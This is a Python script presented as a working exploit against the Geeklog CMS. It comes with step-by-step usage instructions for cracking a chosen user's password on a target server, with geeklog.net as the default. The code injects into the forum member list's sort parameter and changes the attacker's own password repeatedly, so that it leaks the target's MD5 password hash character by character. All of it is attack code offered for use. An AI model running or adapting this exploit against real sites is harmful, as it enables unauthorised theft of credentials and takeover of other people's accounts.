#!/usr/bin/python """ Messy geeklog exploit by jelmer usage : 0. If you haven't got python installed download it at http://www.python.org/ 1. register an account at the geeklog server you want to crack 2. change OUR_USER_ID OUR_USERNAME OUR_PASSWORD OUR_EMAIL in the source code below to the values asigned to the account you generated change GEEKLOG_LOCATION to the location of the geeklog you want to crack for instance http://www.geeklog.net 3. Lookup the userID of the user you want to crack and fill it in as the TARGET_USER_ID below 4. run this script from the commandline by typing python geeklog.py, *nix users can also chmod +x ./geeklog.py Now wait (quite a long time) as it needs to crack 32 positions notes : theoreticly it can produce false results when a user registers while cracking is in progress """ import md5, urllib, urllib2, re OUR_USER_ID = 7000 OUR_USERNAME = "yourusername" OUR_PASSWORD = "yourpassword" OUR_EMAIL = "your@email.com" TARGET_USER_ID = 7001 GEEKLOG_LOCATION = "http://www.geeklog.net" HASHCHARS = "0123456789abcdef" GEN_PASSWORD_CHARS = "abcdefghijklmnopqrstuvwxyz" def getSessionID(username, password): myreq = urllib2.Request(GEEKLOG_LOCATION + "/users.php") data = {"loginname" : username, "passwd" : password } myreq.add_data(urllib.urlencode(data)) page = urllib2.urlopen(myreq) cookies = page.info()["Set-Cookie"] match = re.search(r"gl_session=([0-9]{1,15})", cookies) return match.group(1) def changePassword(sessionID, newPassword): data = {"passwd" : newPassword, "cooktime" : "604800", "email" : OUR_EMAIL, "uid" : str(OUR_USER_ID), "mode" : "saveuser", "username" : OUR_USERNAME } cookie = "gl_session=" + sessionID myreq = urllib2.Request(GEEKLOG_LOCATION + "/usersettings.php") myreq.add_data(urllib.urlencode(data)) myreq.add_header("Cookie",cookie) urllib2.urlopen(myreq) print "changed password to " + newPassword def hexstr(inchars): result = '' for char in inchars: result += ('0' + hex(ord(char))[2:])[-2:] return result def find(input, level, max, character, position): found = False result = "" for char in GEN_PASSWORD_CHARS: if not found: start = input + char if level < max: found, result = find(start, level + 1 , max, character, position) else: if hexstr(md5.new(start).digest())[position] == character: return True, start return found, result def generatePasswordWithHashCharAtPosition(character, position): nrOfChars = 0 while True: (found, value) = find ("", 0, nrOfChars, character, position) if found: return value else: nrOfChars +=1 sessionID = getSessionID(OUR_USERNAME, OUR_PASSWORD) print "got session ID : " + sessionID result = "" for i in range(32): print "cracked %s of 32 hash characters : %s" % ( i, result) page = 1 found = False for j in range(len(HASHCHARS)): changePassword(sessionID, generatePasswordWithHashCharAtPosition(HASHCHARS[j], i)) while True: webpage = urllib2.urlopen(GEEKLOG_LOCATION + "/forum/memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read() us = webpage.find("users.php?mode=profile&uid=" + str(OUR_USER_ID) + '"') target = webpage.find("users.php?mode=profile&uid=" + str(TARGET_USER_ID) + '"') if us != -1 and target != -1: found = us > target break elif us != -1: break elif target != -1: found = True break else: page += 1 print "probeer pagina " + str(page) if found: result += HASHCHARS[j] break print "hash complete : " + result